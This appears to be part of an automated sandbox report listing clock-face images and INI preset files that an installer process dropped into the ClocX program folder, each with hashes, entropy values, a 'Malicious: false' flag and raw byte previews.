Entropy (8bit):	7.906733896939069
Encrypted:	false
SSDEEP:	384:8XK3pDi4J8D6x2f07PdcijEepIP8n3ImeVEvXoGlQVcr:bDicTD7Pd5HIP83IxV3Glf
MD5:	7040CF8BADFFA9D06ACDD6EBDC09EE1B
SHA1:	FD1DD414926151A3CCF845225BD42283DABF666E
SHA-256:	53B13873417183ADC06FA7A02F044C4BE9AB7A34D7572D487B23DF1DC08C8292
SHA-512:	31876C0BD6B8AB89DADA1223D32D0305F1221C3C9A7D96FF9D81938499C26B1E840C47E836CADFC51192F84B465947B1B47B535DF4DBA33C413C6C6A3EA71670
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR.......%.......w.....tEXtCreation Time......().A......tIME.....3.4..#....pHYs.........B.4.....PLTE.............. .." .%!.)#"%$!,($.++%"2&$:%2(%:-)6.*90+52-;32350=82>;;;+)C2.C3.J3/P61B51K94D:5J=9C=8L63R64Z94T95[=9R<9\<:f>>q?@]@;EA;MH?OC=SB=ZI?PA=iA>rCCCEAKHEMKKKF@UD@[IBTIC[LJRMH]PFWPGYPNTSJ\SSTUSYYV\[[[DBcECjFHkKEbJEjNHdMIkGEwMQyRLiRMtUPfUPk\SdYSl^[b^[lXTx_`\|`Vi`]ccZlb[zcccfdihflkkle`se`}jbulczmkpkl{pf\|qnuri}sssvszyw\|{{{KI.QM.ZX.]Z.[`.\d.b].`^.fb.ie.hh.op.mp.sk.rl.vr.vs.\|q.{q.}{.}z.vr.jm.jv.m~.qn.ww.o..o..\|..w..}..x..}..t..u..}..z..z..\|..........................................................................................................................................................................................................................................................................................................f.......tRNS..........................................................................................................

C:\Program Files (x86)\ClocX\Presets\DarkCrystalBall\hourhand-7.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 260 x 9, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	997
Entropy (8bit):	2.0884247801006333
Encrypted:	false
SSDEEP:	6:6v/lhPkgm0CcgCMkuldXGrr05PMnP8wE3BEdBNmoSaRRClb4Ja96mMcKhTVlljp:6v/7sCE2URmP8RBEdBNmoR04Ja9t6Tj
MD5:	DDC1CB30B5B35268F7C85E9E0F2F3039
SHA1:	41808DBE86473A57F1F327BC4740EAEFA9AFFE4F
SHA-256:	D338C477D7542D753C2E919F66C50FB53F8DFD22AE22D4E54A90DB895EF3E433
SHA-512:	C8D39CB4CB8E5A55D00E1652A0889E0FB3B75C9CFBCDBE2BC0DE95425BF9DB7E07111654E2FC3F0CA8D295B70233730D2F94DDBD83AE6F3A5CECB411D4178827
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR..............?.R....tEXtCreation Time......85>`y.....tIME.....*..S.D....pHYs.........B.4.....PLTE...i..S...a......".....P..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................E ....tRNS........S...FIDATx.c`.t........e..H.0....V`.......@`.+......8.4..X._v.-..`.v.;.....W.#....k....IEND.B`.

C:\Program Files (x86)\ClocX\Presets\DarkCrystalBall\minutehand-7.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 260 x 9, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	994
Entropy (8bit):	2.0676937312492822
Encrypted:	false
SSDEEP:	6:6v/lhPkgm0CcgCMkuldXQPMnP8wE3BEdBNmoSaRRClY4bbGVic1xu67z3p:6v/7sCEwmP8RBEdBNmoRP4bb7H67F
MD5:	938CC637343645DC9C62B076D5136EEA
SHA1:	AA97737CE6ED4A6467565FFAE188B8065E3584DC
SHA-256:	8206494360928E9B8567FB00B05249B2E484CBFFE61297CE3AAB13C19319F657
SHA-512:	7A118C93CAC330AF2DEB065F4A19E55884C4099B9963DCE25F8244A9C5FA490E3BE75F16FBFD298E68815C1D0EC4ABB6171C965A213AE5252CD5EFC5DBFC7D60
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR..............?.R....tEXtCreation Time......85>`y.....tIME.....*.Q.#C....pHYs.........B.4.....PLTE...i..S...a......".....P..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................E ....tRNS........S...CIDATx.c`.t....d.@{..0....@`.?.t..6.....t...c@.hJ.....F......@......."..!......IEND.B`.

C:\Program Files (x86)\ClocX\Presets\DarkCrystalBall\secondhand-7.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 258 x 5, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	966
Entropy (8bit):	1.8498608372980492
Encrypted:	false
SSDEEP:	6:6v/lhPk51llGMkuldXgknPMnP8wE4cyOP5Rt+D/6SaRRClMUspNvsOzQp:6v/7Q+EQGmP8ieRt8/6jRjUspqOza
MD5:	903639FD237D7A7AD546C610AC3E5B0C
SHA1:	E387CEC4B6524E228ADDE937FF7A73A10E4D5C7E
SHA-256:	AC322A5C1AB93B1C7C6311EBFBADEBB5FED8D4745032C024FDD4520D040C55B6
SHA-512:	48C4BD0345893432ECA0745A1DA8D9B023BA1E385C37D6157A24FC6B98EBE4A343EA8508902C4B9A3D626982E3D0AB5102C1DA363ACFF16E710FCDCC9E75F0E7
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR................n....tEXtCreation Time......85>`y.....tIME.....+.\.NM....pHYs.........B.4.....PLTE...i..SSS..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................f....tRNS........S...'IDATx.c`..a.................h*`.tA@.... .W4U.Y....IEND.B`.

C:\Program Files (x86)\ClocX\Presets\Earth2.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 99 x 98, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	23596
Entropy (8bit):	7.977189008715547
Encrypted:	false
SSDEEP:	384:fG3wnDvFur/1BzxGeMzVDrTYk4cOLS28OG55+cqkem85Y2YErO5nEOmYKyhMAiw1:xnpu5DczdY1cOHmed9y5H7JUGf
MD5:	3D11A2F8562DD07A4D1C0BCCAD601535
SHA1:	0F123DE33890FD36A1E11A7B8E4F15CA68BDADCC
SHA-256:	1A93F6ED5578452B808BDADF9A19C889D262C2264C98A204AEC82CFD35EDA4A7
SHA-512:	C8856EB5482EBEB1D4F27256DED07995EA4822B759622FA9BAE5474DB6660D746C03AAC48708D8A3A90D2204E38553310BD21FF07AD841664AFA7DF3F6E6511F
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR...c...b.....Dgm0....bKGD..............pHYs............... .IDATx...gP....y.o.cc{"f;bcg&z......[.T.[..T^%.J^...L.@ZH..iH...x...a$..B..C. [.J.}.mz..3.=.3.c^."2"........s...........g...<...O>.7k.....M.}._.......<......p.j kk.X^>.......[22?#^.+.....w......#...0..y.8....S..O8>y...B.w/....y3...c\.............G8.~3...ay....VW..x1....X].`y...]...o.=g....................a<x...z0kk.XY....a.\8........9?..cq.o...........?r.>g.?cv....O..k.P^.....<x...A....>...++...~...1v...t. .....'..........>.v.. .........$-.7..\|LY.g44\|....r..f..k~..V.'\|....?.Fh.O8y.0O.Dp.n.{C..j.......!b.O......K.c.F...bSc..Iu.awgas..?$...N.!..#.d...^.2YD.2...{b...T.......m.....9.....?...!...\U.-..}.........?O.Dp.v....lA..~LR....?..DF..T!.....).[XE~i=E.M.W..l......z.'..m.j..._..[..[Lzv.iY>..E...avxH2(...&6.wX....h;MM.0?...........44~G`.G..._.I..0.;w.[&'......Q\.............+...Q..dd..]TMIu+.M=..Q..Cy].%...S^.Ay]......1..m..LeC..u...SR......z..Ud.......#5=.d...,.Q..dd....

C:\Program Files (x86)\ClocX\Presets\GroenneKugler.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1579
Entropy (8bit):	4.906092571887757
Encrypted:	false
SSDEEP:	24:BE0rGXE5lr9BP5MoaKLuaPTO2u1DHkp8wdGj8xi85sjibtYQTd9iBY2jabOtWuc:BTqylRMofiiNdGjWCUtjTTiBY2Gb+Tc
MD5:	6299257E666FF7E94C35E5C06CF2C369
SHA1:	283C54F59495A84734889776ED6F47ED5AB6A98E
SHA-256:	DBE467C95B421C4E0B99BF65A99FEDA9DD8C86687FF10889D3C1DFA6DBEF3E3B
SHA-512:	942802E9022565303ED072DDE09CDC564870DF7FADCEA4156DF47ABA9F38D99E5E73972BEC64CFC68427B492862BBB5CADE78F41D80274DFAC0C684AFE708113
Malicious:	false
Reputation:	unknown
Preview:	;all colors are in BGR format (hexadecimal or number)..[Settings]..CutColor=0xFF00FF ;cut window by this color (default red).....;not used with PNG in Win2k/XP..DisableAMPM=0 ;force AM/PM indicator disabled (default 0)..AMPMColor=0x787878.;color of AM/PM indicator..AMPMFont=Times New Roman..AMPMFontSize=14 ;size of AM/PM font..AMPMCenterX=61..AMPMCenterY=122......DisableDate=0..DateColor=0x00FF00..DateFont=Arial..DateFontSize=30..DateCenterX=1000..DateCenterY=25......HourColor=0x0000FF ;color of hour hand..HourLength=160 ;length of hour hand..HourLap=0 ;overlap of hour hand..HourWidth=10 ;width of hour hand....MinuteColor=0x0000FF ;color of minute hand..MinuteLength=210 ;length of minute hand..MinuteLap=0 ;overlap of minute hand..MinuteWidth=10 ;width of minute hand....SecondColor=0x00FF00 ;color of second hand..SecondLength=250 ;length of second hand..SecondLap=10 ;ove

C:\Program Files (x86)\ClocX\Presets\GroenneKugler.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 1600 x 900, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	17954
Entropy (8bit):	7.7331748694752225
Encrypted:	false
SSDEEP:	384:mp5XLNVMnsvqqyUuXWEDgdYpUN8y5t0awON+:m3LEXDWEO600sN+
MD5:	B32A0C1C5D6FFEDD2AF545F0C774CF67
SHA1:	A16B334B7B7A19B2F04842C2D586A7D14E78385B
SHA-256:	858D8FF1F4F91C37D2034D3E39FD1B7B9222F63199A92F133766D0C8D03AFF41
SHA-512:	F6365D1353D59B160CCF3719B7CA519A3D5039EC027AFECAFF3BFE5E4F4E9B1303789883B82BA54209C5218E4A99E5CAF32BCFAE6B75D9765178F5778E4D4036
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR...@................tIME..............pHYs.........B.4.....PLTE......."..$..)..,..0..6..:..=..A..E..H..M..O..P..R..U..W..X..Z..\..^..`..b..d..f..g..i..l..n..q..s..v..z..}..~............................... .. ..!.."..#..$..$..&..'..(..)..)..+..,..,..-......../..1..4..8..9..;..<..=..@..E..G..H..I..M..N. P."Q.$R.&V.)T.(Z./[.1].3^.6`.7b.9e.=f.>g.Ai.Ck.El.Fn.Ho.Ko.Iq.Mr.Ns.Pv.Rw.Sw.Ux.Vz.X{.Z}.\~.]..`..b..d..e..g..i..l..m..n..o..o..q..p..s..u..v..x..{..{..\|..~.....................................................................................................................................................................................................................................................................7......tRNS...........................................................................................................................................

C:\Program Files (x86)\ClocX\Presets\GuldKugler.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1579
Entropy (8bit):	4.906092571887757
Encrypted:	false
SSDEEP:	24:BE0rGXE5lr9BP5MoaKLuaPTO2u1DHkp8wdGj8xi85sjibtYQTd9iBY2jabOtWuc:BTqylRMofiiNdGjWCUtjTTiBY2Gb+Tc
MD5:	6299257E666FF7E94C35E5C06CF2C369
SHA1:	283C54F59495A84734889776ED6F47ED5AB6A98E
SHA-256:	DBE467C95B421C4E0B99BF65A99FEDA9DD8C86687FF10889D3C1DFA6DBEF3E3B
SHA-512:	942802E9022565303ED072DDE09CDC564870DF7FADCEA4156DF47ABA9F38D99E5E73972BEC64CFC68427B492862BBB5CADE78F41D80274DFAC0C684AFE708113
Malicious:	false
Reputation:	unknown
Preview:	;all colors are in BGR format (hexadecimal or number)..[Settings]..CutColor=0xFF00FF ;cut window by this color (default red).....;not used with PNG in Win2k/XP..DisableAMPM=0 ;force AM/PM indicator disabled (default 0)..AMPMColor=0x787878.;color of AM/PM indicator..AMPMFont=Times New Roman..AMPMFontSize=14 ;size of AM/PM font..AMPMCenterX=61..AMPMCenterY=122......DisableDate=0..DateColor=0x00FF00..DateFont=Arial..DateFontSize=30..DateCenterX=1000..DateCenterY=25......HourColor=0x0000FF ;color of hour hand..HourLength=160 ;length of hour hand..HourLap=0 ;overlap of hour hand..HourWidth=10 ;width of hour hand....MinuteColor=0x0000FF ;color of minute hand..MinuteLength=210 ;length of minute hand..MinuteLap=0 ;overlap of minute hand..MinuteWidth=10 ;width of minute hand....SecondColor=0x00FF00 ;color of second hand..SecondLength=250 ;length of second hand..SecondLap=10 ;ove

C:\Program Files (x86)\ClocX\Presets\GuldKugler.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 1600 x 900, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	18084
Entropy (8bit):	7.75211321666826
Encrypted:	false
SSDEEP:	384:dMfoGG4iyzLXP0ZCh1zDXZ8L5cevao4+JSIrJUjTTSs6O2M:MoGGTuXsZw1DXZ8LlSZsr6TRHL
MD5:	FE01D57C5DCEE76563AB98CC0C8191CA
SHA1:	61E51410FE6E6E09D8437A80746C2640A31E30B4
SHA-256:	9814CBDBE2037432E1ACD08483A1D09592B7286B10ABED744E7F27E9E53249D6
SHA-512:	55EB4FA8786980D764A006358990BEE376A6AA828EF649BCD5EFB37B40120C45C04E549DAE28010B4D6CDF6997A75887AF6FE06401EB2EFC0798ADDE4B50E34D
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR...@................tIME.....7..&......pHYs.........B.4.....PLTE7,.;0.>2.@4.E7.F8.H:.K<.N?.QA.SC.TD.VE.XG.YH.[I.\J.^L.aN.cP.dQ.fR.iT.jU.lW.nX.q[.r\ t] u^!w`!ya!zb"\|d".f#.g$.i$.j$.l%.m&.o&.p'.q'.s'.t(.u(.v).x).y.z.\|*.~+..,..,..-..-..-......../../..0..0..0..1..1..2..2..3..3..4..4..5..5.6.6.7.7.8.:.<.?.@.B.C.E.G.H.M.N.P.R.U.V.X.Y.[.].^.a.c.d.f.h.k.l.n.o.q.s.t.v..w..y..z..\|..~.................................................................................................................................................................................................................................................................................................................................................................. m#....tRNS...........................................................................................................................................

C:\Program Files (x86)\ClocX\Presets\Holzuhr.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 160 x 153, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	76563
Entropy (8bit):	7.981093231474991
Encrypted:	false
SSDEEP:	1536:a0YzZWfFT+/3XsqBkWMkizXqi1J4Py2huSyPYLY4l6ov4L9RI251yP:aLWt+/3XsY/yzaKJ4Mx4lhS9RDK
MD5:	3A3667D7B67B89C0EA9061711B3C6C6C
SHA1:	D4EF1011E817D469C6079C066104FA12CD03D669
SHA-256:	28FD079455D8B533C4B3B4B217DA82E9097F199EDB3435D9D787B5E42CA342FC
SHA-512:	39FF76E279C8A641CABDC71891D26B31C56ED0F80F68AEDF0273E22C454F36339117316E9AA776CFAD7CAF9A5664406A77C4B3AFCA44C456950EF1DE127A7C65
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR...............1H....pHYs...:...:.d.W.....gAMA....\|.Q.... cHRM..z%..............u0...`..:....o._.F...IDATx....O.....6.uX.L.....T.P.#u.!(.......i.)......i.J1W3.e..Z....w...}.....}Jy.....J9.T9..e..(.D.\|.,..H8w...'DFp-...Q......(...K.P.J..P.-..,..E\|..X.c)..K....P.!.L.....W..8.[Q.M.5.B...5.m...Lj5r..t..YX.U.4i.S..)..)..U...i-..U...Cwu.CM%.;.w.!.kd.]..e..T..V..f!h..h1.....&....g.....jA.[Y.hf.....6^x.y;.b.....!..A...0v.}a.....K!..cl{......?b'0..\.?.+.o>...<.6..o...z..k...F..<...a.SC....2.eor..S.b...r8?.....Q.....<\|..`[.......W^...N6.l...Ys...m.i.....U"4.....YY.0..e.Iw..N.>K....Ck9..2B.j.o.2Rn`.D..c.f>n}........2d.+..E...W...Q%.+..M..3SF]N....W....0@.?I.P.n...J]Kj^..Fi..&..D.....@.". ^..7...ts3..U+/.R?Y..m.MO.....l.l...$.&%97(..D..E.......+..]E...Xp.K.].H.LA.5$)I.KOB...Z*..a6.UR.)..[".9....S]$BS.M.4.UA:..<...hU....5.a.S`./.Q_A.@W....r:.dXT2!..^WN.Z....k.R...r...x^...hU1lP3gk$...[G..B.c...MO.g......%..e..X..5...>3q_.k..D.}...z..

C:\Program Files (x86)\ClocX\Presets\Holzwanduhr.bmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PC bitmap, Windows 3.x format, 128 x 130 x 24, resolution 2834 x 2834 px/m, cbSize 49976, bits offset 54
Category:	dropped
Size (bytes):	49976
Entropy (8bit):	7.092155868494483
Encrypted:	false
SSDEEP:	768:ab87dRTe9524Xb8CR1ShryVMZAFoNYoEnT2Z2++7ClagdgXfgc7InbO:aIcEyVMZAedS2ZJqClwfgc0bO
MD5:	E119CD24C7FD2C54B082E7B27F5E11E4
SHA1:	A78344B1A624CF58B2B6051F9864C966C78375BB
SHA-256:	7AA8F3DECB9E9B660682CAC31A0A77F92F9F47FA55DE60FC259132FD4246135F
SHA-512:	E68052BD60E2973930A59029D4E39491FB277AE27C3649288FA99CD9375F3C70E317DCBF5E0824E4F4D5E50157B6F3FB3294C07CCE0B5BABB7C6CC98A0F5A3B2
Malicious:	false
Reputation:	unknown
Preview:	BM8.......6...(......................................."................... ..$..$..%..% .'..("., .+..)..'..)..)..(".% +!.'..% .'..'..(..(..'..'..'..&..#..%..%.."..#..'..+..-..,../..0..1!"5 3..6#!>'%B&$A&%A''C&%A&$@&&A%'B."=."=&(C((?&$7'%8.!6"'=..6..5!!5! 1..-! 0&'8..3.$7 $6.$3. 0. /!#2. ...!"0""/ .+ .+# ,!...&..$..%..&..%..&(#-(#-.)4/5-)4/+6,6('1##, .( .)"!,#", ".%"-%!,!.(..'#!)&#- .+ .-! , . .)".(%.($.'(.,#-.&0/'0-%.1,/OKM............#..$.$#.$$!$$ #$."#."#."".#".%".&#.'#.(#.) .& .%.."!.$".%..$.."..$..$.."..#..#..%..'..'..%..%..'..(....+..,..+........+..,..0 .3!.4$"7'%;'%;&%:(';'';%';&(<&'<&';&';'(8$&6"#6."5."4.!4!!6##7##6$$7"#8"$9#$8%$7%$6%$6##4""1!!1! 0..+..+..,..,.., ...(..%.."..!..#..(#!++(3+'2)&1((2)'2)(2''2!$."#-"".!!-! . ..!!/# 0#!.#"."#..!+..(..'..(..&..&..&!.%#.&$.&$.&,$.62:?<AB@F56:49=.........$..(."&.&%.'&#%&""&!"'"%'!%& &$.&$.'$.($.'#.(".'".& .# .$".& .&..% .'!.)..(....+...!./!./$#5%%6''7((8():*:():('8&&6%$5##4""3##3! 3..2..1..2..3..3..2..0..0..0../.....-.

C:\Program Files (x86)\ClocX\Presets\IvyLace.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1542
Entropy (8bit):	4.878600306111023
Encrypted:	false
SSDEEP:	24:BEZrGXE5lrABRhB0aKEszdeTOs010BJGkpUdGIo8dip4UGibQ0Wd9i8xLnQI:BkqylUhB0fXjAf6dGJP4AQJTi8xLQI
MD5:	3D708D8F639F76D859E665EF694A62EF
SHA1:	0B1CC310F0033F40D0893BB5A13E6B69E6F2987F
SHA-256:	7BD5BAAF5212EEFAD806866581EEC7CEF31BCA8D1FDB1189F246F3CE6BF0CBFE
SHA-512:	47998441D8C308402C30857C0493C75EC0E5F7CE122A724426DCD35E126EB492F84C0740F663AA41CC33DA80008A5442B93F78CB6A99BA0ECB0DF0471F3F12C2
Malicious:	false
Reputation:	unknown
Preview:	;all colors are in BGR format (hexadecimal or number)..[Settings]..CutColor=0xAC6C1C ;cut window by this color (default red).....;not used with PNG in Win2k/XP..DisableAMPM=0 ;force AM/PM indicator disabled (default 0)..AMPMColor=0x000000.;color of AM/PM indicator..AMPMFont=Times New Roman..AMPMFontSize=12 ;size of AM/PM font..AMPMCenterX=92..AMPMCenterY=112......DisableDate=0..DateColor=0x000000..DateFont=Arial..DateFontSize=10..DateCenterX=90..DateCenterY=76......HourColor=0x011AFD ;color of hour hand..HourLength=29 ;length of hour hand..HourLap=0 ;overlap of hour hand..HourWidth=4 ;width of hour hand....MinuteColor=0x011AFD ;color of minute hand..MinuteLength=40 ;length of minute hand..MinuteLap=0 ;overlap of minute hand..MinuteWidth=3 ;width of minute hand....SecondColor=0x000000 ;color of second hand..SecondLength=47 ;length of second hand..SecondLap=0 ;overlap o

C:\Program Files (x86)\ClocX\Presets\IvyLace.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 193 x 322, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	88214
Entropy (8bit):	7.99675772005271
Encrypted:	true
SSDEEP:	1536:tEYNBJ0JbTvglRPMu2FUqo5pnf6fAXk+C35bv7ty64zIW8X3j0R8zIoAJ:tTNBqPIliu2+rfAr+C35bvZypbY3YSB0
MD5:	DF9960BD75494BE3C8AA6953BC4B869C
SHA1:	1B8E3720D85A3583443ECA58E2827F0BA5E75B0C
SHA-256:	8A265F137F9BD4C9BA7BCA815DE1088E1F95C093A25901350B7CD0B4B14FDE78
SHA-512:	8B939210B7A77616C06E50296B21A3501570748DB2BEFCD6FD05615FB5EFE0CE397B76C9D459C858FB328FF90FC6639CFB9A1B8D782E4925AF1568D3188265FA
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR.......B.....H..^....tIME.....$8L.......pHYs.........n.u>....gAMA......a...X%IDATx..}...U...9wO.y`.9.$QI...5..3. Q...k._.uu..fE.P....00.L....}.snU.4,*....}..u...t..'.S....vr;...Nn'......vr;...Nn'........O_...M.7~.&......N...oG.v.:...9...UGL.G..$@~.v..............6455a..;...............9B....;L&..n7...`...t:...%.....1.4BP..m......'.q..I....cBo.c..5...={.`..$.a......F..Q..B.......D...`0.P[. ..#..A....l1.q#..f.....h.=:u...x$.>... G..IP..v......._>...7...k.HD@G...tZ.sg...H....Euu5L....l..$........././Z1........>x.[...r.>..CUhhh@ee%..:D... .....g~~..u.&..p..x`0z.A.t.$ . P6M..y....3f..\|...&)t..=..:t..;.G..9..3....I...e....f.....$.b..p8..\|<.[RR.z..^.za......oFu.....&.....[.....PUU.f._..d.Ik.{w......@..M;.I@.$.......k.....{.n...-.Fbb.i.........UsR..u.....>....=Z.#;;..:..5k...__H.j.".b.-.....u...`"?@..(........MsG....k..L.^..../.....J...z.WQ.$...1`..<......0 Nn..6M.Y.Zh.n..ZQT.G.....0.tR;...3g...O.1..P..h...Fg.]i..'.#....

C:\Program Files (x86)\ClocX\Presets\Jagua3rClock.bmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PC bitmap, Windows 3.x format, 113 x 113 x 24, resolution 2834 x 2834 px/m, cbSize 38476, bits offset 54
Category:	dropped
Size (bytes):	38476
Entropy (8bit):	5.853923355401225
Encrypted:	false
SSDEEP:	768:y4ktG2kfqzqNul4stj9IkOA/z7kOBSi3TyA+mjg/lhqt4mI6p:ex9xSO44
MD5:	0511D5EDD48E385FE14E0E0A5AD3843C
SHA1:	C742845EC023E86FE7B1CE77733FD5111C286027
SHA-256:	9B5CDA4BCF5F1DE67D41E96FDE3DA74A7355B31C8C30A9867079E5B515774C05
SHA-512:	A8635F77EBDA4E739A922ABFF623B5D4B82F43F5F1358A8E9749FD41B53F855877EFB37B04C1A979E70BE92E85016912D1481D227E4ECE23E2D3FE9A6C7DBB1D
Malicious:	false
Reputation:	unknown
Preview:	BML.......6...(...q...q...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................~~~}}}\|\|\|}}}................................................................................................................................................................................................................................................................................................................~~~xxxtttqqqnnnooonnnooopppqqqtttwwwwwwzzz}}}}}}~~~...................................................................................

C:\Program Files (x86)\ClocX\Presets\Jaguar.bmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PC bitmap, Windows 3.x format, 119 x 120 x 24, resolution 2834 x 2834 px/m, cbSize 43256, bits offset 54
Category:	dropped
Size (bytes):	43256
Entropy (8bit):	4.430342366223317
Encrypted:	false
SSDEEP:	384:kZz8J05teDCm3J1MREBqXFlKbBfqJ+/VAImPWFOQ:cOZHkuqVlKBd0CR
MD5:	41C592514DFA1093A831102815AAD068
SHA1:	20474FCEAD8EDA8247270B171FC0CCD6B1EDBAEC
SHA-256:	86652BF37435C6E524E5DC73056F9A22F08ACFB8E427372E51D4C18FED4F2053
SHA-512:	CD715B96F7F895F5546E2EA80EF9E54643FEB75ACDBE723F6F4246032DEBB7487D338B548FD71041BF4416548AEDCDFA7AED7977EBE245752525130702899DF8
Malicious:	false
Reputation:	unknown
Preview:	BM........6...(...w...x.....................................................................................................................................................................................\|\|\|vvvrrrnnnkkkeee`___^^_^^_^^_^^_^^_^^dcckkknnnqqquuuzzz................................................................................................................................................................................................................................................................................................}}}tttlll]\\PNM.d..[..<_.:Q.(7..#........4 Qp)k.A..=..:..6..3..0../..!q.OLI][Zkkkrrrzzz........................................................................................................................................................................................................................................................................wwwlllWUT.5P.Cb.Wy.Su.;^.4W.?[*G\.-9..!..........#:/\{B..F..>..;..8..:..0{.,u.!k..h.#o..i..a."`.TPOj

C:\Program Files (x86)\ClocX\Presets\Jaguar2.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	27059
Entropy (8bit):	7.870527552757156
Encrypted:	false
SSDEEP:	384:5hLqpEkpEyxcmTzRgctHZTjeZz0V0LFLXxnQISR+ApHwsXRcyXnEWjsExibdCaVO:vuSIEBajH4hBQtJpHwsXT0zpdCao
MD5:	A12A30AD1D5DF1AA37A800872F645267
SHA1:	6B2235DFFB9C8AC6A3D86E852A00D46D623F6843
SHA-256:	FDE433ABA0FDE6691638D7AF029EF95561980183697595097D23BEED55263BC8
SHA-512:	927E205DE83C8A795C2F4C87060386DA15A36B2F3F72EF621AC7BA9A641B1B72F4ADCE839B8C9619901B626C44B0C930C7C3DB475F881EBDF43AAB445F718D8A
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR..............>a.....pHYs.................gAMA....\|.Q.... cHRM..z%..............u0...`..:....o._.F..i)IDATx.b...?.(... ..F.`d....M.#....h.... .F......4..F8.....0..@...DO.D.1j.3...2~..........6".....8\....Y..y..$......DD.....E.x9$D.....89..X..Y~...............7.>_.}...7?.......~....(.....@ZZ..H..i..x..).(.J..rK2......OEVf.Y.N.^..^.n.vf.N6&fv&f.&6...........?.?F..??......./...xv...{...y..............<z......<.=...@.......""!%....,.E......y.T..9T5E....23..................X.q.....I&.H..e`.........../..g.p.!../...........N.."\|..dDx.K.r^...~....g...x..wC5....J..j.R..z.......?.\|1.......<l....y.TD....x..0.3(';.3.70.y..1.3..=..?....+......tFfF.f6F.F`2`d.....?.._.n.z.p..-.+w.3<....;.....$.......2.....~i...Y.._......G.<................!....}ZTZ.?. ..j.....'.hf.E"..".l&.J.....O.x...r.......AO..z..:B....../... BUdTM.M.B.($..c..E...A..8..g.Ga..q.bI.,..+.#<...$!'...z8...7D.G.4P...5.P..f....5NBq.uv..b.....h<.2.R^H.K.b.O.......i.......Xi.&.8..+.HL,....

C:\Program Files (x86)\ClocX\Presets\Jaguar2Clock.bmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PC bitmap, Windows 3.x format, 112 x 113 x 24, resolution 2834 x 2834 px/m, cbSize 38024, bits offset 54
Category:	dropped
Size (bytes):	38024
Entropy (8bit):	4.444331785396521
Encrypted:	false
SSDEEP:	384:mhipaBfLvA0hW8KqcE/iq4UREimrRPwavK:KipG/W8Jc7q4Uaif
MD5:	1FB082E898C2DCF91F26D998690B30A5
SHA1:	87A4DC0D6F778717BB9AF2E2F2B7853CD1CEA6F9
SHA-256:	7E1947AA387E9E85B3E8D83EB850DD26C47C301B4A7F9CCBC098D0C902996F92
SHA-512:	FD929B122F39E74C79F3CD61CBAFA865618B2FA4FDED1700A096FA4DA18AAE9408BCDE9631104E855545BB63CA44254A2B22ACC19C4F8721CFF00FF8F521A59D
Malicious:	false
Reputation:	unknown
Preview:	BM........6...(...p...q...........................................................................................................................................................................................~..\|\|~yyzyy{xxzwxzyyzz\|{~.~.........................................................................................................................................................................................................................................................................................................w}.ntzejo[_cUX[RTVQQSRRTRRUPPTPQSRVUVZXbffosu{...................................................................................................................................................................................................................................................................................z..v~.s{.ox.fpyXbjIRY=EJ4:>157.241340030/3016.250767??IRU[cjks}u~.{..............................................................................

C:\Program Files (x86)\ClocX\Presets\JaguarClock.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	23118
Entropy (8bit):	7.947051271511001
Encrypted:	false
SSDEEP:	384:5Ahl3Fn0P77pTlP0pz5R1RPHwYNUSEAI9wiF/6fXwgQScBeWyW64Z0Y1HKlwJALt:e7WBTpkTvrzEAI9wdvXzgZtEGGL40v0U
MD5:	C257F6DCF2A842219E24F43BD47F09EE
SHA1:	999662C17D219CC7A6675A3EF0868104D13479B2
SHA-256:	D9C00401BF038C437165B16271C0594FA63F0C26355B348EBF126CB322DD8BF2
